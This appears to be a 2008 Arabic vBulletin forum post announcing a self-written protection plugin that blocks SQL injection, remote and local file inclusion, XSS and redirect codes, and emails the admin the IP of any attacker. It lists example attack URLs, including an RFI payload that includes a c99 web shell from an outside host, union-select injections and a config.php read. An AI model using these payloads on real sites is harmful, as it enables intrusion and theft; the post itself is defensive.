|
| |||||||
 |  | |
 |  |  |
 |
| | أدوات الموضوع | طريقة عرض الموضوع |
08-30-2008, 12:39 AM
| |||
| |||
| [ Product ] منع من تطبيق الثغرات و التحويل ومن تلغيم المنتدى اخر اصدار السلام عليكم ورحمة الله وبركاته هذا هاك من برمجتي لحماية المنتدى ومنع تطبيق انواع الثغرات وبشكل محدد تطبيق اكواد الثغرات من انواع SQL , RFI , LFI , Xss واكواد التحويل ومنع تلغيم المنتدى باكواد ثغرات في ملفات ال faq.php وال calendar.php وال showgroups.php والمميز في الهاك انه فيو خاصية التبليغ على البريد مباشرة في حال حدث اي محاولة اختراق راح تصلك رساله وفيها ايبي الي حاول يخترق و استثمار الثغرة والتاريخ والوقت , اولا لا اسمح لاي شخص كان بانه يقوم بتغير الحقوق في البرمجة , ولا حتى حرف واحد ثانية مثال على الهاك مباشرة . أ . منع تطبيق ثغرات ال Remote SQL Injection ( ثغرات الحقن ) http://xxx.com/vb/index.php?id...union%20select http:///xxx.com/vb/index.php?id=-1+union+select http://xxx.com/vb/index.php?id...nion/**/select ب . منع تطبيق ثغرات ال Remote File Include ( ثغرات الاحتواء والتضمين ) http://xxx.com/vb/misc.php?do=page&template={${include('http://casavie.net/hack/c99.txt')}}{${exit()} كود: http://xxx.com/vb/misc.php?do=page&template={${include('http://casavie.net/hack/c99.txt')}}{${exit()}}&ج . منع تطبيق ثغرات ال Remote Local File Include ( ثغرات الاحتواء والتضمين الداخلي ) http://xxx.com/vb/faq.php?faq=...des/config.php د . منع ثغرات ال Cross Site $cripting ( ثغرات سحب كوكيز المدير و الاعضاء وسرقة عضوياتهم ) http://xxx.com/vb/faq.php?faq=...)%3C/******%3E كود: http://xxx.com/vb/faq.php?faq=<******>*****(document.******)</******>منع اي كود تحويل كان وفي حال تواجد الاحصائيات والاهدائات واخر عشر مواضيع , تم حل مشكلتهم قطعيا قطعيا , الان نجي لخطوة تعديل ال البريد : اول ما تحمل الهاك وتفك الضغط عنه , قوم بفتحه بالمفكرة او الدفتر او اي محرر php , قم بالبحث عن alqooods@alqooods.com , واستبدله بالبريد الي بتريد يوصلك عليه تبليغ محاولة الاختراق , ومثال في اخر المنتدى على تطبيقه www.alqooods.com/forums للتحميل اضعط على كلمة product |
|
| مواقع النشر (المفضلة) |
| أدوات الموضوع | |
| طريقة عرض الموضوع | |
| |
-
-
العرض العادي
